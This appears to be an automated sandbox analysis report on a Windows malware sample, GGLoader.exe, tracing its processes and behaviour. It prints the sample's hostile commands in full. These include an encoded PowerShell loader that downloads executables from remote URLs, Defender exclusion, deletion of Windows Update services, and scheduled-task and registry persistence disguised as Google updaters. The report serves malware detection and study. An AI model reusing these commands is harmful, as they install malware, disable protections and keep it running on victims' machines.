Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BEF3A0 35_2_00BEF3A0
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00C0E3AE 35_2_00C0E3AE
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00C08469 35_2_00C08469
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BE6680 35_2_00BE6680
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BEE740 35_2_00BEE740
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BFE890 35_2_00BFE890
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BFB80E 35_2_00BFB80E
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00C03CF8 35_2_00C03CF8
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BEEC30 35_2_00BEEC30
Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E571658 39_2_000002505E571658
Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E56F2F8 39_2_000002505E56F2F8
Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E56B030 39_2_000002505E56B030
Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E5620DC 39_2_000002505E5620DC
Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E56B23C 39_2_000002505E56B23C
Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E5A2258 39_2_000002505E5A2258
Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E59FEF8 39_2_000002505E59FEF8
Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E59BC30 39_2_000002505E59BC30
Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E592CDC 39_2_000002505E592CDC
Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E59BE3C 39_2_000002505E59BE3C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FFD9BAADB69 40_2_00007FFD9BAADB69
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FFD9BAACA10 40_2_00007FFD9BAACA10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FFD9BAAFA62 40_2_00007FFD9BAAFA62
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FFD9BAAC970 40_2_00007FFD9BAAC970
Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C18B23C 41_2_000001C08C18B23C
Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C191658 41_2_000001C08C191658
Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C18F2F8 41_2_000001C08C18F2F8
Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C18B030 41_2_000001C08C18B030
Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C1820DC 41_2_000001C08C1820DC
Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C1BBE3C 41_2_000001C08C1BBE3C
Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C1C2258 41_2_000001C08C1C2258
Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C1BFEF8 41_2_000001C08C1BFEF8
Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C1BBC30 41_2_000001C08C1BBC30
Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C1B2CDC 41_2_000001C08C1B2CDC
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_00000001400014E4 42_2_00000001400014E4
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_0000000140002328 42_2_0000000140002328
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_00000001400026E8 42_2_00000001400026E8
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_0000000140001DB4 42_2_0000000140001DB4
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_0000021311182CDC 42_2_0000021311182CDC
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_000002131118BC30 42_2_000002131118BC30
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_000002131118FEF8 42_2_000002131118FEF8
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_000002131118BE3C 42_2_000002131118BE3C
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_0000021311192258 42_2_0000021311192258
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC621658 43_2_00000225DC621658
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC61B23C 43_2_00000225DC61B23C
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC61F2F8 43_2_00000225DC61F2F8
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC61B030 43_2_00000225DC61B030
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC6120DC 43_2_00000225DC6120DC
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC652258 43_2_00000225DC652258
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC64BE3C 43_2_00000225DC64BE3C
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC64FEF8 43_2_00000225DC64FEF8
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC64BC30 43_2_00000225DC64BC30
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC642CDC 43_2_00000225DC642CDC
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: String function: 007A5D90 appears 54 times
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: String function: 00BF5D90 appears 54 times
PE file contains executable resources (Code or Archives)
Source: poduiwcd.tmp.7.dr Static PE information: Resource name: EXE type: PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
PE file contains more sections than normal
Source: updater.exe.7.dr Static PE information: Number of sections : 11 > 10
Source: LicSend.exe.1.dr Static PE information: Number of sections : 11 > 10
PE file does not import any functions
Source: LicenseGet.exe.1.dr Static PE information: No import functions for PE file found
PE file overlay found
Source: LicenseGet.exe.1.dr Static PE information: Data appended to the last section found
Sample file is different than original file name gathered from version info
Source: GGLoader.exe, 00000000.00000000.1702359898.0000000000FD8000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameD1.exe4 vs GGLoader.exe
Source: GGLoader.exe Binary or memory string: OriginalFilenameD1.exe4 vs GGLoader.exe
Uses 32bit PE files
Source: GGLoader.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses reg.exe to modify the Windows registry
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Very long command line found
Source: C:\Users\user\Desktop\GGLoader.exe Process created: Commandline size = 3770
Source: unknown Process created: Commandline size = 5455
Source: unknown Process created: Commandline size = 5516
Source: C:\Users\user\Desktop\GGLoader.exe Process created: Commandline size = 3770 Jump to behavior
Source: GGLoader.exe, dmjzx.cs Base64 encoded string: 'LUVuY29kZWRDb21tYW5kICJQQUFqQUdjQWNnQjRBQ01BUGdCVEFIUUFZUUJ5QUhRQUxRQlFBSElBYndCakFHVUFjd0J6QUNBQWNBQnZBSGNBWlFCeUFITUFhQUJsQUd3QWJBQWdBQzBBVndCcEFHNEFaQUJ2QUhjQVV3QjBBSGtBYkFCbEFDQUFTQUJwQUdRQVpBQmxBRzRBSUFBdEFFRUFjZ0JuQUhVQWJRQmxBRzRBZEFCTUFHa0Fjd0IwQUNBQUlnQkJBR1FBWkFBdEFGUUFlUUJ3QUdVQUlBQXRBRUVBY3dCekFHVUFiUUJpQUd3QWVRQk9BR0VBYlFCbEFDQUFVd0I1QUhNQWRBQmxBRzBBTGdCWEFHa0FiZ0JrQUc4QWR3QnpBQzRBUmdCdkFISUFiUUJ6QURzQVBBQWpBRzRBZFFCekFDTUFQZ0JiQUZNQWVRQnpBSFFBWlFCdEFDNEFWd0JwQUc0QVpBQnZBSGNBY3dBdUFFWUFid0J5QUcwQWN3QXVBRTBBWlFCekFITUFZUUJuQUdVQVFnQnZBSGdBWFFBNkFEb0FVd0JvQUc4QWR3QW9BQ2NBVGdCdkFDQUFWZ0JwQUhJQWRBQjFBR0VBYkFBZ0FFMEFZUUJqQUdnQWFRQnVBR1VBTHdCVEFHVUFjZ0IyQUdVQWNnQWdBR2tBY3dBZ0FHRUFiQUJzQUc4QWR3QmxBR1FBSVFBZ0FGUUFjZ0I1QUNBQWNnQjFBRzRBYmdCcEFHNEFad0FnQUc4QWJnQWdBR0VBSUFCa0FHa0FaZ0JtQUdVQWNnQmxBRzRBZEFBZ0FHUUFaUUIyQUdrQVl3QmxBQ0VBSndBc0FDY0FKd0FzQUNjQVR3QkxBQ2NBTEFBbkFFVUFjZ0J5QUc4QWNnQW5BQ2tBUEFBakFIY0Fhd0JyQUNNQVBnQTdBQ0lBT3dBOEFDTUFaUUJtQUhJQUl3QStBQ0FBUVFCa0FHUUFMUUJOQUhBQVVBQnlBR1VBWmdCbEFISUFaUUJ1QUdNQVpRQWdBRHdBSXdCbUFIQUFad0FqQUQ0QUlBQXRBRVVBZUFCakFHd0FkUUJ6QUdrQWJ3QnVBRkFBWVFCMEFHZ0FJQUJBQUNnQUpBQmxBRzRBZGdBNkFGVUFjd0JsQUhJQVVBQnlBRzhBWmdCcEFHd0FaUUFzQUNRQVpRQnVBSFlBT2dCVEFIa0Fjd0IwQUdVQWJRQkVBSElBYVFCMkFHVUFLUUFnQUR3QUl3QnVBSG9BYUFBakFENEFJQUF0QUVZQWJ3QnlBR01BWlFBZ0FEd0FJd0JoQUhFQVpBQWpBRDRBT3dBb0FFNEFaUUIzQUMwQVR3QmlBR29BWlFCakFIUUFJQUJUQUhrQWN3QjBBR1VBYlFBdUFFNEFaUUIwQUM0QVZ3QmxBR0lBUXdCc0FHa0FaUUJ1QUhRQUtRQXVBRVFBYndCM0FHNEFiQUJ2QUdFQVpBQkdBR2tBYkFCbEFDZ0FKd0JvQUhRQWRBQndBSE1BT2dBdkFDOEFZZ0JwQUhRQVlnQjFBR01BYXdCbEFIUUFMZ0J2QUhJQVp3QXZBRFVBT1FBMEFEQUFhZ0JuQURrQU9BQXpBRFFBTHdCbkFHWUFNd0EwQURRQU13Qm1BRE1BTHdCeUFHRUFkd0F2QURBQVlRQmtBR1lBWVFCbEFHWUFOQUJtQURnQU5BQTNBR0VBTVFBM0FHVUFZUUEwQUdVQU5BQm1BRFlBTlFBMkFHUUFZd0JrQURnQU5RQmxBRGNBTmdBeUFEa0FNd0EzQURnQU1BQmxBR1FBTHdCRUFDNEFaUUI0QUdVQUp3QXNBQ0FBUEFBakFIQUFhZ0I0QUNNQVBnQWdBQ2dBU2dCdkFHa0FiZ0F0QUZBQVlRQjBBR2dBSUFBOEFDTUFkZ0JqQUhrQUl3QStBQ0FBTFFCUUFHRUFkQUJvQUNBQUpBQmxBRzRBZGdBNkFGUUFaUUJ0QUhBQUlBQThBQ01BZVFCakFIa0FJd0ErQUNBQUxRQkRBR2dBYVFCc0FHUUFVQUJoQUhRQWFBQWdBQ2NBVEFCcEFHTUFaUUJ1QUhNQVpRQkhBR1VBZEFBdUFHVUFlQUJsQUNjQUtRQXBBRHdBSXdCaUFHY0Fhd0FqQUQ0QU93QWdBQ2dBVGdCbEFIY0FMUUJQQUdJQWFnQmxBR01BZEFBZ0FGTUFlUUJ6QUhRQVpRQnRBQzRBVGdCbEFIUUFMZ0JYQUdVQVlnQkRBR3dBYVFCbEFHNEFkQUFwQUM0QVJBQnZBSGNBYmdCc0FHOEFZUUJrQUVZQWFRQnNBR1VBS0FBbkFHZ0FkQUIwQUhBQWN3QTZBQzhBTHdCaUFHa0FkQUJpQUhVQVl3QnJBR1VBZEFBdUFHOEFjZ0JuQUM4QWNnQmxBR01BYUFCbEFHRUFkQUJ6QUc4QWNnQm5BQzhBY2dCbEFHTUFhQUJsQUdFQWRBQnpBR1FBYVFCeUFHVUFZd0IwQUM4QWNnQmhBSGNBTHdBd0FEQUFaUUJpQURJQVpBQXdBR0lBTkFBekFEWUFOUUE1QURFQVpnQmpBR1VBTVFBeEFEVUFNd0JpQUdFQVl3QmhBRGNBTmdBeUFEVUFNQUE1QUdVQU53QTJBRElBWmdBeUFHTUFaUUEwQUM4QVF3Qk1BRkFBTGdCbEFIZ0FaUUFuQUN3QUlBQThBQ01BY3dCaUFHUUFJd0ErQUNBQUtBQktBRzhBYVFCdUFDMEFVQUJoQUhRQWFBQWdBRHdBSXdCb0FIRUFkUUFqQUQ0QUlBQXRBRkFBWVFCMEFHZ0FJQUFrQUdVQWJnQjJBRG9BVkFCbEFHMEFjQUFnQUR3QUl3QnJBSGNBY3dBakFENEFJQUF0QUVNQWFBQnBBR3dBWkFCUUFHRUFkQUJvQUNBQUp3Qk1BR2tBWXdCREFHZ0FaUUJqQUdzQUxnQmxBSGdBWlFBbkFDa0FLUUE4QUNNQWF3QnBBSGdBSXdBK0FEc0F
Source: classification engine Classification label: mal100.troj.adwa.spyw.evad.mine.winEXE@64/89@1/2
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_0000000140002328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceA,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,HeapAlloc,CreateThread,CreateThread,Sleep,SleepEx, 42_2_0000000140002328
Source: C:\Windows\System32\dialer.exe Code function: 37_2_00007FF790DC17A4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString, 37_2_00007FF790DC17A4
Source: C:\Windows\System32\dialer.exe Code function: 37_2_00007FF790DC194C FindResourceExA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,RegOpenKeyExW,RegSetValueExW, 37_2_00007FF790DC194C
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe File created: C:\Program Files\Google\Chrome\updater.exe Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\GGLoader.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6100:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7232:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5080:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3412:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3332:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aro4libn.snb.ps1 Jump to behavior
Source: GGLoader.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: GGLoader.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\GGLoader.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: GGLoader.exe ReversingLabs: Detection: 76%
Source: unknown Process created: C:\Users\user\Desktop\GGLoader.exe "C:\Users\user\Desktop\GGLoader.exe"
Source: C:\Users\user\Desktop\GGLoader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcgB4ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AdQBzACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUALwBTAGUAcgB2AGUAcgAgAGkAcwAgAGEAbABsAG8AdwBlAGQAIQAgAFQAcgB5ACAAcgB1AG4AbgBpAG4AZwAgAG8AbgAgAGEAIABkAGkAZgBmAGUAcgBlAG4AdAAgAGQAZQB2AGkAYwBlACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAawBrACMAPgA7ACIAOwA8ACMAZQBmAHIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHAAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBuAHoAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAHEAZAAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvADUAOQA0ADAAagBnADkAOAAzADQALwBnAGYAMwA0ADQAMwBmADMALwByAGEAdwAvADAAYQBkAGYAYQBlAGYANABmADgANAA3AGEAMQA3AGUAYQA0AGUANABmADYANQA2AGQAYwBkADgANQBlADcANgAyADkAMwA3ADgAMABlAGQALwBEAC4AZQB4AGUAJwAsACAAPAAjAHAAagB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBjAHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBjAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQApADwAIwBiAGcAawAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAGQAaQByAGUAYwB0AC8AcgBhAHcALwAwADAAZQBiADIAZAAwAGIANAAzADYANQA5ADEAZgBjAGUAMQAxADUAMwBiAGEAYwBhADcANgAyADUAMAA5AGUANwA2ADIAZgAyAGMAZQA0AC8AQwBMAFAALgBlAHgAZQAnACwAIAA8ACMAcwBiAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHEAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBrAHcAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBDAGgAZQBjAGsALgBlAHgAZQAnACkAKQA8ACMAawBpAHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBkAGkAcgBlAGMAdAAvAHIAYQB3AC8AMAAwAGUAYgAyAGQAMABiADQAMwA2ADUAOQAxAGYAYwBlADEAMQA1ADMAYgBhAGMAYQA3ADYAMgA1ADAAOQBlADcANgAyAGYAMgBjAGUANAAvAEQAZQB2AG0AaQBuAC4AZQB4AGUAJwAsACAAPAAjAGQAdQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABoAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdQBzAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAUwBlAG4AZAAuAGUAeABlACcAKQApADwAIwBoAHcAb
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\LicCheck.exe "C:\Users\user\AppData\Local\Temp\LicCheck.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\LicSend.exe "C:\Users\user\AppData\Local\Temp\LicSend.exe"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
